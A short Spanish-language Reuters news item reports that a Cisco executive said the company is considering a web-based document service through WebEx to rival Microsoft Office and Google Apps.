Doug Dennerline, vicepresidente senior de Cisco, mencionó que la firma podría desarrollar un servicio que permitiría a los usuarios comerciales crear documentos para ser guardados y compartidos mediante su servicio WebEx de reuniones virtuales.

Las alternativas con base en internet frente al Office de Microsoft surgieron hace cinco años, pero los usuarios corporativos todavía no lo incorporan como herramienta de trabajo debido a que la llamada cloud computing aún tiene sus riesgos.

Si la iniciativa despega, se podría convertir en un gran negocio: la división Office de Microsoft alcanzó ventas de u$s60 mil millones en el ultimo año fiscal.

Google vende Google Apps, una alternativa basada en internet que es una alternativa a Microsoft Office.

Dennerline, que maneja los productos de colaboración en línea de Cisco, dijo que está interesado de ingresar al área.

"Ese es un espacio interesante. Ciertamente estamos pensando en eso", dijo durante una rueda de prensa, sin entrar en detalles. Los servicios WebEx actualmente incluyen reuniones en línea, correo electrónico y mensajería instantánea.

Adicionalmente dijo que Cisco no está interesada en competir con Salesforce.com en vender aplicaciones online que las empresas puedan usar para manejar las ventas y las actividades de mercadeo.

Analistas han especulado por tiempo que Cisco planeaba entras en el negocio.

Fuente: Reuters

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